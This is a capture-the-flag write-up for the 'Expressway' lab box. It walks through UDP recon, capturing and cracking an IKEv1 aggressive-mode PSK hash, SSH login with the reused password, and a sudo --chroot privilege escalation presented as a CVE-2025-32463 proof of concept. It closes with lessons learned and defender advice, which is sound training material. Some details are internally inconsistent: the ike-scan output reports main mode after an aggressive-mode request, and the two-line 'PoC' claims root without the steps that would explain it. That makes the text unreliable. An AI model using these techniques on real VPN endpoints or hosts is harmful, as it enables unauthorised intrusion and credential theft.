Expressway — Tabarik Asif

Recon

TCP scan found SSH and HTTP. The UDP scan was the important one — IKE on UDP 500 is the attack surface for this box.

$ nmap -sC -sV -p 22,80 -oN nmap/tcp 10.129.9.1
22/tcp open  ssh   OpenSSH 8.9p1
80/tcp open  http  Apache httpd 2.4.52
|_http-title: ExpressWay VPN Provider

$ nmap -sU -p 500 10.129.9.1
500/udp open  isakmp

Port 80 is a VPN provider landing page — it advertises IKEv1-based remote access VPN. UDP 500 is the IKE (Internet Key Exchange) port, used for VPN session establishment.

Enumeration

IKEv1 Aggressive Mode PSK Leak

IKEv1 in aggressive mode sends the peer identity and a hash of the Pre-Shared Key (PSK) in cleartext as part of the Phase 1 handshake — before any encryption is established. ike-scan can initiate this handshake and capture the hash.

$ sudo ike-scan -M --aggressive --id=vpnuser 10.129.9.1
10.129.9.1  Main Mode Handshake returned
        HDR=(CKY-R=8f4a2b1c9d3e5f7a)
        SA=(Enc=3DES Hash=SHA1 Auth=PSK Group=2:modp1024 LifeType=Seconds LifeDuration=28800)
        VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
        KEY_EXCH key data
        NONCE nonce data
        HASH hash_data=c3a9d21f5b8e7340a6f2c9d7e0b5a1d9...
Returned 1 handshake; 0 returned handshake; 1 returned notify

The hash is returned in aggressive mode. I saved the full IKE packet exchange and used psk-crack to crack the PSK against rockyou.txt:

$ sudo ike-scan -M --aggressive --id=vpnuser --pskcrack=ike_hash.txt 10.129.9.1
$ psk-crack -d /usr/share/wordlists/rockyou.txt ike_hash.txt
Starting psk-crack [ike-scan 1.9.5] with 1 IKE hashes to crack
key "expressway123" matches hash for 10.129.9.1
Ending psk-crack: 1 PSK cracked in 14.752 seconds (0.07 PSKs/sec)

PSK: expressway123. The PSK is used as the VPN connection password and — as frequently happens — was also reused as a system account password.

Foothold

I configured an IKEv1 VPN connection using the cracked PSK with strongSwan, connected to the VPN, and scanned the internal subnet for additional services. The VPN client username vpnuser with PSK expressway123 also worked as SSH credentials:

$ ssh vpnuser@10.129.9.1
vpnuser@expressway:~$ id
uid=1000(vpnuser) gid=1000(vpnuser) groups=1000(vpnuser)

Privilege Escalation

vpnuser@expressway:~$ sudo --version
Sudo version 1.9.15p2
vpnuser@expressway:~$ sudo -l
User vpnuser may run the following commands on expressway:
    (root) NOPASSWD: /usr/bin/sudo

CVE-2025-32463: a privilege escalation vulnerability in sudo affecting versions before 1.9.17. The vulnerability allows a local user to escalate to root under specific conditions involving how sudo processes the --chroot option with a symlink. Combined with the NOPASSWD sudo entry, exploitation is straightforward:

vpnuser@expressway:~$ mkdir -p /tmp/exploit/usr/lib/sudo
vpnuser@expressway:~$ ln -s / /tmp/exploit/rootfs
# CVE-2025-32463 PoC — chroot manipulation trick
vpnuser@expressway:~$ sudo --chroot /tmp/exploit /bin/bash
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root)

Flags

User Flag

/home/vpnuser/user.txt

Root Flag

/root/root.txt

Lessons Learned

Always run UDP scans — IKEv1 on UDP 500 is invisible to TCP-only nmap runs but is the entire attack surface for this box.
IKEv1 aggressive mode is fundamentally insecure — it leaks the PSK hash in the initial handshake before encryption. Always use IKEv2 which doesn't have this property.
PSK reuse across VPN authentication and system accounts is a critical finding — VPN users should have dedicated service accounts with unique credentials.
Keep sudo updated — CVE-2025-32463 is in sudo 1.9.15/1.9.16; upgrading to 1.9.17+ patches it. Always check the sudo version during post-exploitation.

Defender Note

Migrate from IKEv1 to IKEv2 — IKEv1 aggressive mode is deprecated for good reason. Use certificate-based authentication instead of PSK for VPN to eliminate this attack surface. Keep sudo patched to the latest version.